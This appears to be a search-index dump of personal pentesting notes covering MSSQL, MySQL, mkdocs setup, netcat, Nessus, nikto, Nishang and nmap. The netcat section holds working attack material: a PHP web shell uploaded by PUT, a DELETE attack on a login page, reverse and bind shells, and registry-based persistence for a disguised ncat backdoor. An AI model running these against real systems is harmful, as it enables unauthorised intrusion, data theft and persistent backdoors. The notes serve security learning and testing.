    locate mssqlclient\n

    Of the MSSQL clients listed above, pentesters may find Impacket's mssqlclient.py to be the most useful due to SecureAuthCorp's Impacket project being present on many pentesting distributions at install.

    ","tags":["database","cheat sheet"]},{"location":"mssql/#database-configuration","title":"Database configuration","text":"

    When an admin initially installs and configures MSSQL to be network accessible, the SQL service will likely run as NT SERVICE\\MSSQLSERVER. Connecting from the client-side is possible through Windows Authentication, and by default, encryption is not enforced when attempting to connect.

    Authentication being set to Windows Authentication means that the underlying Windows OS will process the login request and use either the local SAM database or the domain controller (hosting Active Directory) before allowing connectivity to the database management system.

    Misconfigurations to look at:

    • MSSQL clients not using encryption to connect to the MSSQL server.
    • The use of self-signed certificates when encryption is being used. It is possible to spoof self-signed certificates
    • The use of named pipes
    • Weak & default sa credentials. Admins may forget to disable this account
    ","tags":["database","cheat sheet"]},{"location":"mssql/#interact-with-mssql","title":"Interact with MSSQL","text":"","tags":["database","cheat sheet"]},{"location":"mssql/#from-linux","title":"From Linux","text":"

    sqsh

     sqsh -S $IP -U username -P Password123 -h\n # -h: disable headers and footers for a cleaner look.\n\n# When using Windows Authentication, we need to specify the domain name or the hostname of the target machine. If we don't specify a domain or hostname, it will assume SQL Authentication.\nsqsh -S $ip -U .\\\\<username> -P 'MyPassword!' -h\n# For windows authentication we can use  SERVERNAME\\\\accountname or .\\\\accountname\n
    ","tags":["database","cheat sheet"]},{"location":"mssql/#from-windows","title":"From Windows","text":"

    sqlcmd

    The\u00a0sqlcmd\u00a0utility lets you enter Transact-SQL statements, system procedures, and script files through a variety of available modes:

    • At the command prompt.
    • In Query Editor in SQLCMD mode.
    • In a Windows script file.
    • In an operating system (Cmd.exe) job step of a SQL Server Agent job.

    Careful. In some environments the command GO needs to be in lowercase.

    sqlcmd -S $IP -U username -P Password123\n\n\n# We need to use GO after our query to execute the SQL syntax. \n# List databases\nSELECT name FROM master.dbo.sysdatabases\ngo\n\n# Use a database\nUSE dbName\ngo\n\n# Show tables\nSELECT table_name FROM dbName.INFORMATION_SCHEMA.TABLES\ngo\n\n# Select all Data from Table \"users\"\nSELECT * FROM users\ngo\n
    ","tags":["database","cheat sheet"]},{"location":"mssql/#gui-application","title":"GUI Application","text":"

    mssql-cli, mssqlclient.py, dbeaver

    ","tags":["database","cheat sheet"]},{"location":"mssql/#sql-server-management-studio-or-ssms","title":"SQL Server Management Studio or SSMS","text":"

    Only in windows. Download, install, and connect to database.

    ","tags":["database","cheat sheet"]},{"location":"mssql/#dbeaver","title":"dbeaver","text":"

    dbeaver is a multi-platform database tool for Linux, macOS, and Windows that supports connecting to multiple database engines such as MSSQL, MySQL, PostgreSQL, among others, making it easy for us, as an attacker, to interact with common database servers.

    ","tags":["database","cheat sheet"]},{"location":"mssql/#mssqlclientpy","title":"mssqlclient.py","text":"

    Alternatively, we can use the tool from Impacket with the name\u00a0mssqlclient.py.

    mssqlclient.py -p 1433 <username>@$ip \n
    ","tags":["database","cheat sheet"]},{"location":"mssql/#basic-commands","title":"Basic commands","text":"
    # Get Microsoft SQL server version\nselect @@version;\n\n# Get usernames\nselect user_name()\ngo \n\n# Get databases\nSELECT name FROM master.dbo.sysdatabases\ngo\n\n# Get current database\nSELECT DB_NAME()\ngo\n\n# Get a list of users in the domain\nSELECT name FROM master..syslogins\ngo\n\n# Get a list of users that are sysadmins\nSELECT name FROM master..syslogins WHERE sysadmin = 1\ngo\n\n# And to make sure: \nSELECT is_srvrolemember(\u2018sysadmin\u2019)\ngo\n# If your user is admin, it will return 1.\n\n# Read Local Files in MSSQL\nSELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents\n

    Also, you might be interested in executing a cmd shell using xp_cmdshell by reconfiguring sp_configure.

    ","tags":["database","cheat sheet"]},{"location":"my-mkdocs-material-customization/","title":"mkdocs","text":"

    MkDocs is a static site generator for building project documentation. Documentation source files are written in Markdown, and configured with a single YAML configuration file.

    I chose mkdocs to build the site because of its simplicity.

    Link to site.

    Some other options: hugo.

    "},{"location":"my-mkdocs-material-customization/#my-install","title":"My install","text":"

    Install a virtual environment such as virtualenvwrapper.

    Create your virtual environment and activate it:

    mkvirtualenv hackinglife\n\nworkon hackinglife\n

    Install mkdocs. It's version 1.5.3. in my case:

    pip install mkdocs==1.5.3\n

    Install material theme for mkdocs:

    pip install mkdocs-material\n

    Install plugins such as glightbox:

    pip install mkdocs-glightbox\n

    Install plugins such as \"git-revision-date-localized\"

    pip3 install mkdocs-git-revision-date-localized-plugin\n

    Install plugins such as \"mkdocs-pdf-export\"

    pip install mkdocs-pdf-export-plugin\n
    "},{"location":"my-mkdocs-material-customization/#customizing-material-theme-pluggins-and-extensions","title":"Customizing Material theme: pluggins and extensions","text":"

    Some plugins like \"mkdocs-glightbox\", \"mkdocs-git-revision-date-localized-plugin\", or \"mkdocs-pdf-export-plugin\", need to be added when the web app is deployed, so for that reason they are added at .github/workflow/doc.yml.

    But some other pluggings just need to be added in the mkdocs configuration file (mkdocs.yml) like this:

    markdown_extensions:\n    - extensionName\n
    "},{"location":"my-mkdocs-material-customization/#admonition-extension","title":"Admonition extension","text":"

    Source: https://squidfunk.github.io/mkdocs-material/reference/admonitions/

    In mkdocs.yml:

    markdown_extensions:\n    - admonition\n    - pymdownx.details \n    - pymdownx.superfences\n
    "},{"location":"my-mkdocs-material-customization/#basic-syntax","title":"Basic syntax","text":"

    Code in the document:

    !!! note \"title\"\n\n    Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod \n    nulla. \n

    How it is seen:

    title

    Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla et euismod nulla.

    Admonitions follow a simple syntax: a block starts with\u00a0!!!, followed by a single keyword used as a\u00a0type qualifier. The content of the block follows on the next line, indented by four spaces

    !!! <typeofchart> \"title\"\n

    When\u00a0Details\u00a0is enabled and an admonition block is started with\u00a0???\u00a0instead of\u00a0!!!, the admonition is rendered as a collapsible block with a small toggle on the right side.

    These are the type qualifier: note abstract info tip success question warning failure danger bug example quote

    "},{"location":"my-mkdocs-material-customization/#content-tabs","title":"Content tabs","text":"

    Source: https://squidfunk.github.io/mkdocs-material/reference/content-tabs/

    In mkdocs.yml:

    markdown_extensions:\n  - pymdownx.superfences\n  - pymdownx.tabbed:\n      alternate_style: true \n

    Code in the document:

    === \"Left\"\n    Content\n\n=== \"Center\"\n    Content\n\n=== \"Right\"\n    Content\n

    How it is seen:

    LeftCenterRight

    Content

    Content

    Content

    "},{"location":"my-mkdocs-material-customization/#data-tables","title":"Data tables","text":"

    Source: https://squidfunk.github.io/mkdocs-material/reference/data-tables/#customization

    In mkdocs.yml:

     extra_javascript:\n      - https://unpkg.com/tablesort@5.3.0/dist/tablesort.min.js\n      - javascripts/tablesort.js\n

    After applying the customization, data tables can be sorted by clicking on a column-. This is code in the document

    Data table, columns sortable
    | Method      | Description                          |\n| ----------- | ------------------------------------ |\n| `GET`       | Fetch resource  |\n| `PUT`       | Update resource |\n| `DELETE`    | Delete resource |\n

    This is how it is seen:

    Method Description GET Fetch resource PUT Update resource DELETE Delete resource"},{"location":"my-mkdocs-material-customization/#pdf-button-in-every-page","title":"PDF button in every page","text":"

    Most of the existing plugins offer a print-all-in-one-file solution, which is not my intended development.

    "},{"location":"my-mkdocs-material-customization/#mkdocs-pdf-export-plugin","title":"mkdocs-pdf-export-plugin","text":"

    https://github.com/zhaoterryy/mkdocs-pdf-export-plugin

    Install and add to gh-deploy workflow:

    pip install mkdocs-pdf-export-plugin\n

    mkdocs.yml

    plugins:\n    - search\n    - pdf-export:\n        verbose: true\n        combined: false\n        media_type: print\n        enabled_if_env: ENABLE_PDF_EXPORT\n

    /docs/css/extra.css

    @page {\n    size: a4 portrait;\n    margin: 25mm 10mm 25mm 10mm;\n    counter-increment: page;\n    font-family: \"Roboto\",\"Helvetica Neue\",Helvetica,Arial,sans-serif;\n    white-space: pre;\n    color: grey;\n    @top-left {\n        content: '\u00a9 2018 My Company';\n    }\n    @top-center {\n        content: string(chapter);\n    }\n    @top-right {\n        content: 'Page ' counter(page);\n    }\n}\n
    "},{"location":"my-mkdocs-material-customization/#resolving-relative-link-issues-when-rendering","title":"Resolving relative link issues when rendering","text":"

    https://octoprint.github.io/mkdocs-site-urls/

    "},{"location":"my-mkdocs-material-customization/#revision-date","title":"Revision date","text":"

    https://timvink.github.io/mkdocs-git-revision-date-localized-plugin/ ]

    Install and add to gh-deploy workflow:

    # Installs git revision date plugin globally\npip install mkdocs-git-revision-date-plugin\n

    mkdocs.yml

    # Adding the git revision date plugin\nplugins:\n- search\n- git-revision-date\n    type: timeago \n    timezone: Europe/Amsterdam \n    fallback_to_build_date: false \n    enable_creation_date: true \n    exclude: \n    - index.md \n    enabled: true \n    strict: true\n

    This plugin needs access to the last commit that touched a specific file to be able to retrieve the date. By default many build environments only retrieve the last commit, which means you might need to:

    • github actions: set\u00a0fetch-depth\u00a0to\u00a00\u00a0(docs)

    Types

    November 28, 2019           # type: date (default)\nNovember 28, 2019 13:57:28  # type: datetime\n2019-11-28                  # type: iso_date\n2019-11-28 13:57:26         # type: iso_datetime\n20 hours ago                # type: timeago\n28. November 2019           # type: custom\n

    To add a revision date to the default\u00a0mkdocs\u00a0theme, add a\u00a0overrides/partials\u00a0folder to your\u00a0docs\u00a0folder and update your\u00a0mkdocs.yml\u00a0file. Then you can extend the base\u00a0mkdocs\u00a0theme by adding a new file\u00a0docs/overrides/content.html:

    :octicons-file-code-16: mkdocs.yml
    ```yaml\ntheme:\n    name: mkdocs\n    custom_dir: docs/overrides\n```\n
    :octicons-file-code-16: docs/hackinglifetheme/partials/content.html
    ```html\n<!-- Overwrites content.html base mkdocs theme, taken from \nhttps://github.com/mkdocs/mkdocs/blob/master/mkdocs/themes/mkdocs/content.html -->\n\n{% if page.meta.source %}\n    <div class=\"source-links\">\n    {% for filename in page.meta.source %}\n        <span class=\"label label-primary\">{{ filename }}</span>\n    {% endfor %}\n    </div>\n{% endif %}\n\n{{ page.content }}\n\n<!-- This section adds support for localized revision dates -->\n{% if page.meta.git_revision_date_localized %}\n    <small>Last update: {{ page.meta.git_revision_date_localized }}</small>\n{% endif %}\n{% if page.meta.git_created_date_localized %}\n    <small>Created: {{ page.meta.git_created_date_localized_raw_datetime }}</small>\n{% endif %}\n```\n
    "},{"location":"mybb-pentesting/","title":"Pentesting MyBB","text":"

    Once we know we are in front of a MyBB CMS, one useful tool would be MyBBscan.

    ","tags":["MyBB","pentesting","CMS"]},{"location":"mybb-pentesting/#mybbscan","title":"MyBBScan","text":"

    Original repo: https://github.com/0xB9/MyBBscan.

    My forked repo: https://github.com/amandaguglieri/CMS-MyBBscan.

    ","tags":["MyBB","pentesting","CMS"]},{"location":"mysql/","title":"MySQL","text":"

    MySQL: MySQL is an open-source relational database management system(RDBMS) based on Structured Query Language (SQL). It is developed and managed by oracle corporation and initially released on 23 may, 1995. It is widely being used in many small and large scale industrial applications and capable of handling a large volume of data. After the acquisition of MySQL by Oracle, some issues happened with the usage of the database and hence MariaDB was developed.

    By default, MySQL uses\u00a0TCP/3306.

    ","tags":["database","relational database","SQL"]},{"location":"mysql/#authentication-mechanisms","title":"Authentication Mechanisms","text":"

    MySQL supports different authentication methods, such as username and password, as well as Windows authentication (a plugin is required).

    MySQL\u00a0default system schemas/databases:

    • mysql\u00a0- is the system database that contains tables that store information required by the MySQL server
    • information_schema\u00a0- provides access to database metadata
    • performance_schema\u00a0- is a feature for monitoring MySQL Server execution at a low level
    • sys\u00a0- a set of objects that helps DBAs and developers interpret data collected by the Performance Schema
    ","tags":["database","relational database","SQL"]},{"location":"mysql/#footprinting-mysql","title":"Footprinting mysql","text":"
    sudo nmap $ip -sV -sC -p3306 --script mysql*\n
    ","tags":["database","relational database","SQL"]},{"location":"mysql/#basic-commands","title":"Basic commands","text":"

    Additionally there are two strings that you can use to comment a line in SQL:

    • # The hash symbol.
    • --The two dashes followed by a space-
    # Show datases\nSHOW databases;\n\n# Show tables\nSHOW tables;\n\n# Create new database\nCREATE DATABASE nameofdatabase;\n\n# Delete database\nDROP DATABASE nameofdatabase;\n\n# Select a database\nUSE nameofdatabase;\n\n# Show tables\u00e7\nSHOW tables;\n\n# Dump columns from nameOftable\nSELECT * FROM NameOfTable;\n# SELECT name, description FROM products WHERE id=9;\n\n# Create a table with some columns in the previously selected database\nCREATE TABLE person(nombre VARCHAR(255), edad INT, id INT);\n\n# Modify, add, or remove a column attribute of a table\nALTER TABLE persona MODIFY edad VARCHAR(200);\nALTER TABLE persona ADD description VARCHAR(200);\nALTER TABLE persona DROP edad VARCHAR(200);\n\n# Insert a new row with values in a table\nINSERT INTO persona VALUES(\"alvaro\", 54, 1);\n
    ","tags":["database","relational database","SQL"]},{"location":"mysql/#basic-queries","title":"Basic queries","text":"
    # Show all columns from table\nSELECT * FROM persona\n\n# Select a row from a table filtering by the value of a given column\nSELECT * FROM persona WHERE nombre=\"alvaro\";\n\n# JOIN query\nSELECT * FROM oficina JOIN persona ON persona.id=oficina.user_id;\n\n# UNION query. This means, for an attack, that the number of columns has to be the same\nSELECT * FROM oficina UNION SELECT * from persona;\n\n# Sorting data on the bases on edad column\nSELECT * FROM persona ORDER BY edad;\n\n# Retrieving first record from the table.\nSELECT * from persona order by edad limit 1;\n\n# Count the number of people stored in persona\nSELECT count(*) from persona;\n\n# Context: a wordpress database\n# Identify how many distinct authors have published a post in the blog\nSELECT DISTINCT(post_author) from wpdatabase.wp_posts;\n
    # UNION Statement syntax\n#<SELECT statement> UNION <other SELECT statement>;\n# Example:\nSELECT name, description FROM products WHERE id=9 UNION SELECT price FROM products WHERE id=9;\n
    ","tags":["database","relational database","SQL"]},{"location":"mysql/#enumeration-queries","title":"Enumeration queries","text":"
    # Show current user\ncurrent_user()\nuser()\n\n# Show current database\ndatabase()\n
    ","tags":["database","relational database","SQL"]},{"location":"mysql/#interact-with-mysql","title":"Interact with MySQL","text":"","tags":["database","relational database","SQL"]},{"location":"mysql/#from-linux","title":"From Linux","text":"
    mysql -u username -pPassword123 -h $IP\n# -h host/ip   \n# -u user As default mysql has a root user with no authentication\nmysql --host=INSTANCE_IP --user=root --password=thepassword\nmysql -h <host/IP> -u root -p<password>\nmysql -u root -h <host/IP>\n
    ","tags":["database","relational database","SQL"]},{"location":"mysql/#from-windows","title":"From Windows","text":"
    mysql.exe -u username -pPassword123 -h $IP\n
    ","tags":["database","relational database","SQL"]},{"location":"mysql/#gui-application","title":"GUI Application","text":"","tags":["database","relational database","SQL"]},{"location":"mysql/#server-management-studio-or-ssms","title":"Server Management Studio or SSMS","text":"

    SQL Server Management Studio or SSMS

    ","tags":["database","relational database","SQL"]},{"location":"mysql/#mysql-workbench","title":"MySQL Workbench","text":"

    Download from: https://dev.mysql.com/downloads/workbench/.

    ","tags":["database","relational database","SQL"]},{"location":"mysql/#dbeaver","title":"dbeaver","text":"

    dbeaver\u00a0is a multi-platform database tool for Linux, macOS, and Windows that supports connecting to multiple database engines such as MSSQL, MySQL, PostgreSQL, among others, making it easy for us, as an attacker, to interact with common database servers.

    To install\u00a0dbeaver\u00a0using a Debian package we can download the release .deb package from\u00a0https://github.com/dbeaver/dbeaver/releases\u00a0and execute the following command:

    sudo dpkg -i dbeaver-<version>.deb\n\n# run dbeaver in a second plane\n dbeaver &\n
    ","tags":["database","relational database","SQL"]},{"location":"mysql/#well-know-vulnerabilities","title":"Well-know vulnerabilities","text":"","tags":["database","relational database","SQL"]},{"location":"mysql/#misconfigurations","title":"Misconfigurations","text":"

    Anonymous access enabled.

    ","tags":["database","relational database","SQL"]},{"location":"mysql/#vulnerabilities","title":"Vulnerabilities","text":"

    MySQL 5.6.x\u00a0servers: \u00a0CVE-2012-2122\u00a0, among others. It allowed us to bypass authentication by repeatedly using the same incorrect password for the given account because the\u00a0timing attack\u00a0vulnerability existed in the way MySQL handled authentication attempts. In this timing attack, MySQL repeatedly attempts to authenticate to a server and measures the time it takes for the server to respond to each attempt. By measuring the time it takes the server to respond, we can determine when the correct password has been found, even if the server does not indicate success or failure.

    ","tags":["database","relational database","SQL"]},{"location":"mythic/","title":"Mythic C2 Framework","text":"

    https://github.com/its-a-feature/Mythic

    The Mythic C2 framework is an alternative option to Metasploit as a Command and Control Framework and toolbox for unique payload generation. A cross-platform, post-exploit, red teaming framework built with GoLang, docker, docker-compose, and a web browser UI. It's designed to provide a collaborative and user friendly interface for operators, managers, and reporting throughout red teaming.

    ","tags":["payloads","tools"]},{"location":"nessus/","title":"Nessus","text":"

    Nessus has a client and a server. We use the client to configure the scans and the server to actually perform the scanning processes and report back the result to the client.

    ","tags":["reconnaissance","scanner","vulnerability assessment"]},{"location":"nessus/#installation","title":"Installation","text":"

    Download .deb from: https://www.tenable.com/downloads/nessus

    sudo dpkg -i Nessus-10.3.0-debian9_amdb64.deb\nservice nessusd start\n

    Now you can go to https://localhost:8834

    Once installed Nessus Esentials, register in the website to generate an API key.

    Nessus gives us the option to create scan policies. Essentially these are customized scans that allow us to define specific scan options, save the policy configuration, and have them available to us under Scan Templates when creating a new scan.

    This gives us the ability to create targeted scans for any number of scenarios, such as a slower, more evasive scan, a web-focused scan, or a scan for a particular client using one or several sets of credentials.

    To exclude false positives from scan results Under the Resources section, we can select Plugin Rules. In the new plugin rule, we input the host to be excluded, along with the Plugin ID for Microsoft DirectAccess, for instance.

    Nessus gives us the option to export scan results in a variety of report formats as well as the option to export raw Nessus scan results to be imported into other tools, archived, or passed to tools, such as EyeWitness. Nessus gives the option to export scans into two formats Nessus (scan.nessus) or Nessus DB (scan.db). The .nessus file is an .xml file and includes a copy of the scan settings and plugin outputs. The .db file contains the .nessus file and the scan's KB, plugin Audit Trail, and any scan attachments.

    Scripts such as the nessus-report-downloader can be used to quickly download scan results in all available formats from the CLI using the Nessus REST API:

    ./nessus_downloader.rb \n
    ","tags":["reconnaissance","scanner","vulnerability assessment"]},{"location":"nessus/#mitigating-issues","title":"Mitigating Issues","text":"

    1. Some firewalls will cause us to receive scan results showing either all ports open or no ports open. If this happens, a quick fix is often to configure an Advanced Scan and disable the Ping the remote host option.

    2. Adjust Performance Options and modify Max Concurrent Checks Per Host if the target host is often under heavy load, such as a widely used web application.

    3. Unless specifically requested, we should never perform Denial of Service checks. The \"safe checks\" setting allows Nessus users to enable a set of plugins within Nessus' library of vulnerability checks which Tenable feels can have negative effects on the network, device or application being tested.

    4. It is also essential to keep in mind the potential impact of vulnerability scanning on a network, especially on low bandwidth or congested links. This can be measured using vnstat:

    ","tags":["reconnaissance","scanner","vulnerability assessment"]},{"location":"netbios/","title":"NetBIOS - Network Basic Input Output System","text":"

    NetBIOS stands for Network Basic Input Output System. Basically, servers and clients use NetBIOS when viewing network shares on the local area network.

    NetBIOS supplies hostname, NetBIOS name, Domain, Network shares when querying a computer. When a MS Windows machine browses a network , it uses NetBIOS:

    • datagrams to list the shares amd the machines (port 138 / UDP)
    • names to find wrous (port 137 / UDP)
    • sessions to transmit data to and from a windows share (port 139 / TCP )
    ","tags":["windows"]},{"location":"netbios/#create-a-network-share-in-a-windows-based-environment","title":"Create a network share in a Windows based environment:","text":"
    1. Turn on the File and Printer Sharing service.
    2. Choose directories to share
    UNC paths (Universal Naming Convention paths) \\\\Servername\\ShareName\\file.nat\n\n\\\\ComputerName\\C$\n\n\\\\ComputerName\\admin$\n\n\\\\ComputerName\\ipc$\u00a0 \u00a0 \u00a0 //inter process communication\n
    ","tags":["windows"]},{"location":"netcat/","title":"netcat","text":"","tags":["http"]},{"location":"netcat/#installation","title":"Installation","text":"

    Preinstalled in kali. Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP.

    For windows: https://nmap.org/ncat/.

    For linux:

    sudo apt install ncat\n
    ","tags":["http"]},{"location":"netcat/#usage","title":"Usage","text":"

    It\u2019s used for HTTP

    nc $ip <port> -flags\n
    ","tags":["http"]},{"location":"netcat/#fingerprinting-with-netcat","title":"Fingerprinting with netcat","text":"
    nc $ip 80\nHEAD / HTTP/1.0     \n# And hit RETURN twice\n

    Also, Nmap does not always recognize all information by default. Sometimes you can use netcat to interpelate a service:

     nc -nv $ip <PORT NUMBER>\n
    ","tags":["http"]},{"location":"netcat/#netcat-commands","title":"Netcat commands","text":"","tags":["http"]},{"location":"netcat/#as-a-server","title":"As a server","text":"
    nc -lvp 8888\n#-p: specify a port\n#-l: to listening\n#-v: verbosity\n#-u: enforces udp connection\n#-e: executes the given command\n
    ","tags":["http"]},{"location":"netcat/#as-a-client","title":"As a client","text":"
    nc -v $ip <port>\n
    ","tags":["http"]},{"location":"netcat/#transfer-data","title":"Transfer data","text":"

    On the server side:

    #data will be printed on screen\nnc -lvp <port>  \n

    On the client side:

    echo \u201chello\u201d | nc -v $ip <port>\n
    ","tags":["http"]},{"location":"netcat/#transfer-data-and-save-it-in-a-file","title":"Transfer data and save it in a file","text":"

    On the server side:

    # Data will be stored in reveived.txt file.\nnc -lvp <port> > received.txt   \n

    On the client side:

    echo \u201chello\u201d | nc -v $ip <port>\n
    ","tags":["http"]},{"location":"netcat/#transfer-file-and-save-it","title":"Transfer file and save it","text":"

    On the server side:

    # Received data will be stored in reveived.txt file.\nnc -lvp <port> > received.txt   \n

    On the client side:

    cat tobesentfiel.txt | nc -v $ip <port>\n
    ","tags":["http"]},{"location":"netcat/#netcat-shell","title":"Netcat shell","text":"

    On the server side:

    nc -lvp <port> -e /bin/bash\n

    On the client side:

    nc -v $ip <port>\n
    ","tags":["http"]},{"location":"netcat/#some-enumeration-techniques-for-http-verbs","title":"Some enumeration techniques for HTTP verbs","text":"
    # Send a OPTIONS message with netcat\nnc victim.target 80\nOPTIONS / HTTP/1.0\n
    ","tags":["http"]},{"location":"netcat/#some-exploitation-techniques-for-http-verbs","title":"Some exploitation techniques for HTTP verbs","text":"","tags":["http"]},{"location":"netcat/#delete-attack","title":"DELETE attack","text":"
    # General syntax for removing a resource from server using netcat\nnc victim.site 80\nDELETE /path/to/resource.txt HTTP/1.0\n\n\n# Example for removing the login page of a site\nnc victim.site 80\nDELETE /login.php HTTP/1.0\n
    ","tags":["http"]},{"location":"netcat/#put-attack-getting-a-shell","title":"PUT attack: getting a shell","text":"
    # Save for instance a php basic shell in a file (shell.php):\n\n<?php \nif (isset($_GET[\u2018cmd\u2019]))\n{\n    $cmd = $_GET[\u2018cmd\u2019];\n    echo \u2018<pre>\u2019;\n    $result = shell_exec($cmd);\n    echo $result;\n    echo \u2018</pre>\u2019;\n?>\n\n\n# Count the size of the file\nwc -m shell.php\n\n# Send with netcat the HTTP verb message\nnc victim.site 80\nPUT /shell.php HTTP/1.0\nConten-type: text/html\nContent-length: [number you got with wc -m payload]\n\n\n# Run the exploit by typing in the browser:\nhttp://victim.site/shell.php?cmd=cat+/etc/passwd\n
    ","tags":["http"]},{"location":"netcat/#backdoors-with-netcat","title":"Backdoors with netcat","text":"","tags":["http"]},{"location":"netcat/#the-attacker-initiates-the-connection","title":"The attacker initiates the connection","text":"

    In the victim machine: If windows, get the ncat.exe executable file, rename it to something else such as winconfig and we write in command line:

    wincofig -l -p <port> -e cmd.exe\n# Example: wincofig -l -p 5555 -e cmd.exe\n

    In the attacker machine:

    ncat <victim IP address> <port specified>\n# Example: ncat 192.168.0.40 5555\n
    ","tags":["http"]},{"location":"netcat/#the-victim-initiates-the-connection","title":"The victim initiates the connection","text":"

    Great to avoid firewalls!!!

    In the victim machine: If windows, get the ncat.exe executable file, rename it to something else such as winconfig and we write in command line:

    winconfig -e cmd.exe <attacker IP> <port>\n# Example: winconfig -e cmd.exe 192.168.1.40 5555\n
    In the attacker machine:

    ncat -l -p <port> -v\n# Example: ncat -l -p 5555 -v\n
    ","tags":["http"]},{"location":"netcat/#creating-a-registry-in-regedit","title":"Creating a registry in regedit","text":"
    • In regedit, go to Computer\\HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
    • Right-Button > New > String value
    • We name it exactly like the ncat.exe file (if we renamed it to winconfig, then we call this registry winconfig>
    • We edit the registry and we add the path to the executable file and some commands in the Value data:
    \u201cC:\\Windows/System32\\winconfig.exe <attacker IP> <port> -e cmd.exe\u201d\n# For instance: \u201cC:\\Windows/System32\\winconfig.exe 192.168.1.50 5540 -e cmd.exe\u201d\n
    ","tags":["http"]},{"location":"netcraft/","title":"netcraft","text":"

    Netcraft can offer us information about the servers without even interacting with them, and this is something valuable from a passive information gathering point of view. We can use the service by visiting https://sitereport.netcraft.com and entering the target domain. We need to pay special attention to the latest IPs used.

    Sometimes we can spot the actual IP address from the webserver before it was placed behind a load balancer, web application firewall, or IDS, allowing us to connect directly to it if the configuration.

    See Information Gathering phase in a Security assessment.

    ","tags":["web","pentesting","reconnaissance"]},{"location":"netdiscover/","title":"netdiscover - A network enumeration tool based on ARP request","text":"

    Netdiscover is another discovery tool, built in Kali Linux 2018.2. It performs reconnaissance and discovery on both wireless and switched networks using ARP requests.

    What is cool about netdiscover? Being nmap a best suited tool for almost everything, netdiscover provides a way to find Internal IP addresses and MAC addresses. That is the difference: netdiscover works only in internal networks.

    ","tags":["reconnaissance","pentesting"]},{"location":"netdiscover/#installation","title":"Installation","text":"

    Sometimes, you may be given an outdated kali ova with no netdiscover tool installed. To install:

    sudo apt-get install netdiscover\n
    ","tags":["reconnaissance","pentesting"]},{"location":"netdiscover/#basic-commands","title":"Basic commands","text":"
    # Get help\nnetdiscover -h\n\n# Get all host in an interface and in a range\n# -i: interface\n# -r: range\nnetdiscover -i eth0 -r 192.168.5.42/24 \n
    ","tags":["reconnaissance","pentesting"]},{"location":"network-traffic-capture/","title":"Network traffic capture tools","text":"","tags":["pentesting","network","toolS"]},{"location":"network-traffic-capture/#some-proxy-tools","title":"Some proxy tools","text":"
    • Wireshark.
    • Netmon (Microsoft Network Monitor).
    • Fiddler: a web debugging proxy.
    • BurpSuite.
    • Echo Mirage: for thick clients: freeware tool that hooks into an application\u2019s process and enables us to monitor the network interactions being done.
    • Postman.
    ","tags":["pentesting","network","toolS"]},{"location":"nikto/","title":"nikto","text":"

    You will get some results related to headers such as, for example:

    • The anti-clickjacking X-Frame-Options header is not present.
    • The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
    • The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type

    Run:

    nikto -h domain.com -o nikto.html -Format html\n\n\nnikto -h http://domain.com/index.php?page=target-page.php -Tuning 5 -Display V\n# -Display V : turn verbose mode on\n# -Tuning 5 : Level 5 is considered aggressive, covering a wide range of tests but may also increase the likelihood of false positives. \n
    ","tags":["web pentesting","reconnaissance","WSTG-INFO-02"]},{"location":"nishang/","title":"Nishang","text":"

    Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.

    ","tags":["payloads","tools"]},{"location":"nishang/#installation","title":"Installation","text":"

    Download from github repo: https://github.com/samratashok/nishang.

    sudo apt install nishang\n
    ","tags":["payloads","tools"]},{"location":"nishang/#antak-webshell","title":"Antak Webshell","text":"

    Antak is a webshell written in ASP.Net which utilizes PowerShell. Active Server Page Extended (ASPX) is a file type/extension written for Microsoft's ASP.NET Framework. Antak is included within the Nishang project.

    The Antak files can be found in the /usr/share/nishang/Antak-WebShell directory.

    When uploaded on a http server in the victim machine, Antak web shell functions like a Powershell Console. However, it will execute each command as a new process. It can also execute scripts in memory and encode commands you send.

    Before uploading Antak you will need to specify the user and password you want to use.

    ","tags":["payloads","tools"]},{"location":"nmap/","title":"nmap - A network exploration and security auditing tool","text":"","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#description","title":"Description","text":"

    Network Mapper is an open source tool for network exploration and security auditing. Free and open-source scanner created by Gordon Lyon. Nmap is used to discover hosts and services on a computer network by sending packages and analyzing the responses. Another discovery feature is that of operating system detection. These features are extensible by scripts that provide more advanced service detection.

    nmap <scan types> <options> $ip\n
    # commonly used\nnmap -sT -Pn --unprivileged --script banner $ip\n\n# enumerate ciphers supported by the application server\nnmap -sT -p 443 -Pn -unprivileged --script ssl-enum-ciphers $ip\n\n# sync-scan the top 10,000 most well-known ports\nnmap -sS $ip --top-ports 10000\n

    Worthwhile for understanding how packages are sent and received is the --packet-trace option. Also --reason displays the reason for specific result.

    Also, Nmap does not always recognize all information by default. Sometimes you can use netcat to interpelate a service:

     nc -nv $ip <PORT NUMBER>\n
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#cheat-sheet","title":"Cheat Sheet","text":"

    By default, Nmap will conduct a TCP scan unless specifically requested to perform a UDP scan.

